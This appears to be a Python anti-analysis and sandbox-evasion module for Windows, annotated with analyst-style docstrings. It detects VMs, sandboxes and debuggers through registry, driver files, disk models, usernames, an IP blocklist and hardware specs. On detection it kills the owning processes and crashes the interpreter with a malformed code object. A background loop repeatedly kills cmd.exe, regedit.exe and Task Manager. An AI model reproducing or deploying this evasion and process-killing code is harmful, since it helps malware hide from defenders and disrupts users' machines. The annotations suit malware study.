import os
import sys
import glob
import ctypes
import subprocess
import threading
from win32gui import GetWindowText, EnumWindows
from win32process import GetWindowThreadProcessId
from psutil import Process, process_iter, virtual_memory, cpu_count, disk_usage
from requests import get
from winreg import HKEY_LOCAL_MACHINE, OpenKey, CloseKey, QueryValueEx
# Çıkış fonksiyonu
def exit_program(reason):
    """Print *reason*, then hand a hand-built code object to ``exec``.

    This is not a normal shutdown: there is no ``sys.exit`` and no cleanup.
    The code object is constructed directly from the code type with 14
    positional arguments and a two-byte string in the seventh position,
    presumably so that the interpreter dies abruptly instead of unwinding.

    NOTE(review): the code-type constructor's signature is specific to the
    CPython version, so what actually happens here (hard crash vs. a Python
    exception) depends on the interpreter the sample runs under; confirm
    during analysis.

    Analyst note: every detection path in this file funnels through this
    function, so the "[!] ..." line on stdout followed by an abnormal
    process end is the visible outcome of a triggered check.
    """
    print(f"[!] {reason}")
    code_type = type((lambda: 0).__code__)
    junk_code = code_type(0, 0, 0, 0, 0, 0, b'\x053', (), (), (), '', '', 0, b'')
    exec(junk_code)
# Debugger pencere kontrolü
def check_windows():
    """Enumerate top-level windows forever, reacting to analysis-tool titles.

    Each window title is lowercased and compared for exact equality against
    a fixed set of names (debuggers, decompilers, proxies, process
    monitors). On a match the function tries to terminate the process that
    owns the window and then calls ``exit_program``.

    Analyst notes:
      * The outer loop has no sleep, so the thread running this spins
        continuously on ``EnumWindows``.
      * The value returned by ``GetWindowThreadProcessId`` is iterated
        when it is not a plain int, and every element is passed to
        ``Process(...).terminate()``. NOTE(review): pywin32 is expected to
        return a (thread id, process id) pair here, in which case a
        process whose PID happens to equal the thread id could also be
        terminated; confirm.
      * All errors are swallowed by bare ``except`` clauses.
    """
    def _on_window(hwnd, ctx):
        # Callback invoked by EnumWindows once per top-level window.
        title = GetWindowText(hwnd).lower()
        tool_titles = {
            'proxifier', 'graywolf', 'extremedumper', 'zed', 'exeinfope', 'dnspy',
            'titanHide', 'ilspy', 'titanhide', 'x32dbg', 'codecracker', 'simpleassembly',
            'process hacker 2', 'pc-ret', 'http debugger', 'process monitor', 'debug',
            'reverse', 'simpleassemblyexplorer', 'process', 'de4dotmodded', 'sharpod',
            'folderchangesview', 'fiddler', 'die', 'pizza', 'Crâck', 'strongod', 'ida -',
            'brute', 'dump', 'StringDecryptor', 'wireshark', 'debugger', 'httpdebugger',
            'gdb', 'kdb', 'x64_dbg', 'windbg', 'x64netdumper', 'petools', 'scyllahide',
            'megadumper', 'reversal', 'ksdumper', 'dbgclr', 'HxD', 'monitor', 'peek',
            'ollydbg', 'http', 'wpe pro', 'dbg', 'httpanalyzer', 'httpdebug', 'PhantOm',
            'kgdb', 'james', 'x32_dbg', 'proxy', 'phantom', 'mdbg', 'system explorer',
            'de4dot', 'x64dbg', 'protection_id', 'charles', 'systemexplorer', 'pepper',
            'hxd', 'procmon64', 'ghidra', 'xd', '0harmony', 'hacker', 'process hacker',
            'SAE', 'mdb', 'checker', 'harmony', 'PETools', 'scyllaHide', 'x96dbg',
            'systemexplorerservice', 'folder', 'mitmproxy', 'dbx', 'sniffer', 'http toolkit',
        }
        if title not in tool_titles:
            return

        owner = GetWindowThreadProcessId(hwnd)
        # A bare int is treated as one id; anything else is iterated.
        owner_ids = [owner] if type(owner) is int else owner
        for owner_id in owner_ids:
            try:
                Process(owner_id).terminate()
            except:
                pass
        exit_program(f'Debugger tespit edildi: {title}')

    while True:
        try:
            EnumWindows(_on_window, None)
        except:
            pass
# IP kontrolü
def check_ip():
    """Look up the host's public IP and exit if it is on a fixed list.

    The address is fetched from ``https://api64.ipify.org/`` with a
    five-second timeout and compared against a hard-coded set.

    Analyst notes: this produces an outbound HTTPS request to an IP-echo
    service early in execution, which is a useful network observable. Any
    failure (no network, timeout, exception) is silently ignored, so the
    check passes on an isolated host.
    """
    blocked_addresses = {
        '88.132.227.238', '79.104.209.33', '92.211.52.62', '20.99.160.173',
        '188.105.91.173', '64.124.12.162', '195.181.175.105', '194.154.78.160',
        '109.74.154.92', '88.153.199.169', '34.145.195.58', '178.239.165.70',
        '88.132.231.71', '34.105.183.68', '195.74.76.222', '192.87.28.103',
        '34.141.245.25', '35.199.6.13', '34.145.89.174', '34.141.146.114',
        '95.25.204.90', '87.166.50.213', '193.225.193.201', '92.211.55.199', None,
    }
    try:
        response = get('https://api64.ipify.org/', timeout=5)
        public_ip = response.text.strip()
        if public_ip in blocked_addresses:
            exit_program('IP adresi kara listede')
    except:
        pass
# VM süreç kontrolü
def check_vm_processes():
    """Exit if a VMware or VirtualBox guest-tools process is running.

    Walks the process list once and compares each process name, case
    sensitively, with four fixed executable names. Errors while reading a
    process name are ignored per process.
    """
    guest_tool_names = ('VMwareService.exe', 'VMwareTray.exe', 'VBoxService.exe', 'VBoxTray.exe')
    for running in process_iter():
        try:
            if running.name() in guest_tool_names:
                exit_program('VM süreci tespit edildi')
        except:
            pass
# Registry kontrolü
def check_registry():
    """Probe two registry locations for virtual-machine markers.

    1. Runs a ``REG QUERY`` command against a path under the display
       adapter device class and exits when the returned status is anything
       other than 1.
    2. Reads value ``0`` of the Disk service's ``Enum`` key and exits when
       it contains "VMware" or "VBOX".

    NOTE(review): ``system`` is not among the names imported at the top of
    this file; unless it is defined elsewhere, the first call raises
    ``NameError``, which the bare ``except`` swallows, and the rest of the
    function never runs. Confirm before relying on either step firing.

    Analyst note: when the first step does run it spawns a ``reg.exe``
    child process, which is visible in process-creation telemetry.
    """
    try:
        status = system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")
        if status != 1:
            exit_program('VM registry anahtarı tespit edildi')

        disk_enum_key = OpenKey(HKEY_LOCAL_MACHINE, 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')
        try:
            first_disk = QueryValueEx(disk_enum_key, '0')[0]
            if any(marker in first_disk for marker in ("VMware", "VBOX")):
                exit_program('VM disk tespit edildi')
        finally:
            # The key handle is released whether or not the query succeeded.
            CloseKey(disk_enum_key)
    except:
        pass
# DLL kontrolü
def check_dll():
    """Exit if known VMware/VirtualBox guest files exist under SystemRoot.

    The three relative paths are joined onto the ``SystemRoot`` environment
    variable (falling back to ``C:\\Windows``) and tested with
    ``os.path.exists``. Unlike most checks in this file there is no
    ``try``/``except`` around the body.
    """
    guest_files = ["System32\\vmGuestLib.dll", "vboxmrxnp.dll", "System32\\drivers\\vmmouse.sys"]
    windows_dir = os.environ.get("SystemRoot", "C:\\Windows")
    for relative in guest_files:
        candidate = os.path.join(windows_dir, relative)
        if os.path.exists(candidate):
            exit_program('VM DLL tespit edildi')
# Sistem özellikleri kontrolü
def check_specs():
    """Exit when the host looks under-provisioned.

    Thresholds, as written: 4 GiB of RAM or less, a root volume of 50 GiB
    or less, or a single CPU. Sizes are truncated to whole GiB by cutting
    the decimal string at the first ".".

    Analyst note: small default sandbox or VM profiles fall below these
    limits, so this check alone can stop the sample in a minimal guest.
    Any exception is swallowed.
    """
    def _whole_gib(byte_count):
        # Same string-based truncation as the original expression.
        return int(str(byte_count / 1024 / 1024 / 1024).split(".")[0])

    try:
        ram_gb = _whole_gib(virtual_memory()[0])
        disk_gb = _whole_gib(disk_usage('/')[0])
        cpu = int(cpu_count())
        if not ram_gb > 4:
            exit_program('Yetersiz RAM')
        if not disk_gb > 50:
            exit_program('Yetersiz disk alanı')
        if not cpu > 1:
            exit_program('Yetersiz CPU')
    except:
        pass
# KVM sürücü kontrolü
def check_kvm():
    """Exit if VirtIO/KVM guest driver files are present in System32.

    Each entry is used as a glob pattern directly under
    ``%SystemRoot%/System32``; a non-empty match list triggers
    ``exit_program``. There is no exception handling in this function.
    """
    virtio_patterns = ["balloon.sys", "netkvm.sys", "vioinput*", "viofs.sys", "vioser.sys"]
    system32 = os.path.join(os.getenv("SystemRoot", ""), "System32")
    for pattern in virtio_patterns:
        matches = glob.glob(os.path.join(system32, pattern))
        if matches:
            exit_program('KVM sürücüsü tespit edildi')
# Ekran boyutu kontrolü
def check_screen():
    """Exit when the primary display is smaller than 800x600.

    Reads the screen width and height through ``GetSystemMetrics`` (indices
    0 and 1) from user32. Any failure is ignored.
    """
    try:
        metrics = ctypes.windll.user32.GetSystemMetrics
        width, height = metrics(0), metrics(1)
        too_small = width < 800 or height < 600
        if too_small:
            exit_program('Şüpheli ekran boyutu')
    except:
        pass
# Parallels kontrolü
def check_parallels():
    """Exit if a System32 entry name contains a Parallels driver prefix.

    Lists ``%SystemRoot%/System32`` and does a case-insensitive substring
    test of every entry name against ``prl_sf``, ``prl_tg`` and
    ``prl_eth``. A listing failure or any other exception is ignored.
    """
    parallels_drivers = ["prl_sf", "prl_tg", "prl_eth"]
    sys32 = os.path.join(os.getenv("SystemRoot", ""), "System32")
    try:
        for entry in os.listdir(sys32):
            entry_lower = entry.lower()
            for marker in parallels_drivers:
                if marker in entry_lower:
                    exit_program('Parallels tespit edildi')
    except:
        pass
# QEMU kontrolü
def check_qemu():
    """Exit if a System32 entry name contains a QEMU guest-agent marker.

    Lists ``%SystemRoot%/System32`` and does a case-insensitive substring
    test of every entry name against ``qemu-ga`` and ``qemuwmi``. Any
    exception is ignored.
    """
    qemu_drivers = ["qemu-ga", "qemuwmi"]
    sys32 = os.path.join(os.getenv("SystemRoot", ""), "System32")
    try:
        for entry in os.listdir(sys32):
            entry_lower = entry.lower()
            for marker in qemu_drivers:
                if marker in entry_lower:
                    exit_program('QEMU tespit edildi')
    except:
        pass
# Son dosya aktivitesi kontrolü
def check_recent_files():
    """Exit when the user's Recent folder holds fewer than 20 entries.

    The folder is ``%APPDATA%/microsoft/windows/recent``. A freshly built
    analysis image usually has little user history, which is what this
    heuristic keys on. If ``APPDATA`` is unset or the folder cannot be
    listed, the exception is swallowed and the check passes.
    """
    try:
        recent_dir = os.path.join(os.getenv('APPDATA'), 'microsoft', 'windows', 'recent')
        entry_count = len(os.listdir(recent_dir))
        if entry_count < 20:
            exit_program('Şüpheli dosya aktivitesi')
    except:
        pass
# Triage sandbox kontrolü
def check_triage():
    """Exit if a disk model string matches a known sandbox disk name.

    Runs ``wmic diskdrive get model`` and looks for "DADY HARDDISK" or
    "QEMU HARDDISK" in the text output.

    Analyst note: the ``wmic`` child process is visible in
    process-creation telemetry. A missing ``wmic`` binary or a non-zero
    exit status raises, and the bare ``except`` turns that into a pass.
    """
    try:
        models = subprocess.check_output(['wmic', 'diskdrive', 'get', 'model'], text=True)
        for sandbox_model in ("DADY HARDDISK", "QEMU HARDDISK"):
            if sandbox_model in models:
                exit_program('Sandbox disk tespit edildi')
                break
    except:
        pass
# USB kontrolü
def check_usb():
    """Exit when the registry shows no USB storage device history.

    Runs ``reg query`` on the ``USBSTOR`` enum key and counts output lines
    that start with ``HKEY_LOCAL_MACHINE`` (one per subkey). A count of
    zero triggers ``exit_program``. Nothing is evaluated when the command
    writes to stderr, and any exception is ignored.

    Analyst note: the ``reg.exe`` child process and its USBSTOR argument
    are visible in process-creation telemetry.
    """
    try:
        query = subprocess.Popen(
            ['reg', 'query', 'HKLM\\SYSTEM\\ControlSet001\\Enum\\USBSTOR'],
            stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output, err = query.communicate()
        if not err:
            key_lines = [
                line for line in output.decode('utf-8').split("\n")
                if line.strip().startswith("HKEY_LOCAL_MACHINE")
            ]
            if len(key_lines) == 0:
                exit_program('USB cihaz bulunamadı')
    except:
        pass
# Kullanıcı adı kontrolü
def check_username():
    """Exit when the logged-on user name is on a fixed list.

    ``USERNAME`` is read from the environment, lowercased and compared for
    exact equality with names commonly seen on analysis images, including
    the Windows Defender Application Guard utility account.
    """
    sandbox_names = ["johnson", "miller", "malware", "maltest", "currentuser", "sandbox",
                     "virus", "john doe", "test user", "sand box", "wdagutilityaccount"]
    current_user = os.getenv("USERNAME", "").lower()
    if current_user not in sandbox_names:
        return
    exit_program('Şüpheli kullanıcı adı')
# GPU kontrolü
def check_gpu():
    """Exit if the video controller name mentions VirtualBox or VMware.

    Runs ``wmic path win32_VideoController get name`` with ``shell=True``
    and searches the lowercased raw output bytes. Nothing is evaluated when
    the command writes to stderr, and any exception is ignored.

    Analyst note: because of ``shell=True`` the command is launched through
    the command interpreter, so the process tree shows a shell parent for
    ``wmic``. The arguments are fixed literals; no external input reaches
    the command line.
    """
    try:
        query = subprocess.Popen(
            ['wmic', 'path', 'win32_VideoController', 'get', 'name'],
            stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        output, err = query.communicate()
        if not err:
            adapter_names = output.lower()
            if b"virtualbox" in adapter_names or b"vmware" in adapter_names:
                exit_program('VM ekran kartı tespit edildi')
    except:
        pass
# VM artifacts kontrolü
def check_vm_artifacts():
    """Exit if VirtualBox/VMware files or install directories are present.

    Two passes:
      * every entry directly under ``%SystemRoot%/System32`` is compared,
        case-insensitively, with a list of guest driver file names
        (errors in this pass are swallowed);
      * two fixed install directories are tested with ``os.path.exists``
        (this pass is outside the ``try`` block).
    """
    bad_files = ["VBoxMouse.sys", "VBoxGuest.sys", "VBoxSF.sys", "VBoxVideo.sys",
                 "vmmouse.sys", "vboxogl.dll"]
    bad_dirs = [r'C:\Program Files\VMware', r'C:\Program Files\oracle\virtualbox guest additions']
    system32 = os.getenv("SystemRoot", "") + r'\System32'
    try:
        for entry_path in glob.glob(os.path.join(system32, "*")):
            entry_name = os.path.basename(entry_path).lower()
            if entry_name in [name.lower() for name in bad_files]:
                exit_program('VM dosyası tespit edildi')
    except:
        pass

    for install_dir in bad_dirs:
        if os.path.exists(install_dir):
            exit_program('VM dizini tespit edildi')
# Sürekli süreç kontrolü
def continuous_process_check():
    """Loop forever, killing any process whose name is on a fixed list.

    Process names are lowercased and compared for exact equality. The list
    mixes analysis tools (Wireshark, Fiddler, x64dbg, IDA, ...) with
    ordinary Windows utilities: ``cmd.exe``, ``regedit.exe`` and
    ``taskmgr.exe``.

    Analyst notes:
      * This is the most disruptive routine in the file: while it runs,
        Task Manager, Registry Editor and every command prompt on the host
        are killed repeatedly, which users and responders will notice.
      * There is no sleep between scans, so the thread spins continuously.
      * Unlike the other checks it never calls ``exit_program``; failures
        to kill (for example access denied) are silently ignored.
    """
    blacklist = ["http toolkit.exe", "httpdebuggerui.exe", "wireshark.exe", "fiddler.exe",
                 "charles.exe", "regedit.exe", "cmd.exe", "taskmgr.exe", "processhacker.exe",
                 "ida64.exe", "ollydbg.exe", "x96dbg.exe", "x32dbg.exe", "x64dbg.exe"]
    while True:
        try:
            for running in process_iter():
                try:
                    image_name = running.name().lower()
                    if image_name in blacklist:
                        running.kill()
                except:
                    pass
        except:
            pass
# Tüm kontrolleri başlat
def initialize_protection():
    """Run every one-shot environment check, then start the two monitors.

    The one-shot checks run in the listed order on the calling thread; an
    exception escaping any of them is swallowed so the next one still
    runs. Afterwards ``check_windows`` and ``continuous_process_check`` are
    started as daemon threads, so they end when the main thread does.
    """
    one_shot_checks = (
        check_ip, check_vm_processes, check_registry, check_dll, check_specs,
        check_kvm, check_screen, check_parallels, check_qemu, check_recent_files,
        check_triage, check_usb, check_username, check_gpu, check_vm_artifacts,
    )
    # Fast, run-once checks.
    for run_check in one_shot_checks:
        try:
            run_check()
        except:
            pass

    # Continuous checks run in background daemon threads.
    for monitor in (check_windows, continuous_process_check):
        watcher = threading.Thread(target=monitor, daemon=True)
        watcher.start()
# Ana program
if __name__ == "__main__":
    # Start the environment checks and background monitors first.
    initialize_protection()

    # Password prompt. The expected value is a cleartext literal in the
    # source, so it can be read straight out of the file; the checks above
    # are the only thing standing between an analyst and this comparison.
    while True:
        try:
            sifre = input("Şifre girin: ")
            if sifre != "2331563":
                print("Şifre yanlış, tekrar denemek için herhangi bir tuşa basın")
                input()
                continue
            print("Doğru!")
            break
        except:
            # Any error at the prompt (including end of input or Ctrl+C,
            # since the except is bare) goes to the same exit routine.
            exit_program("Hata oluştu")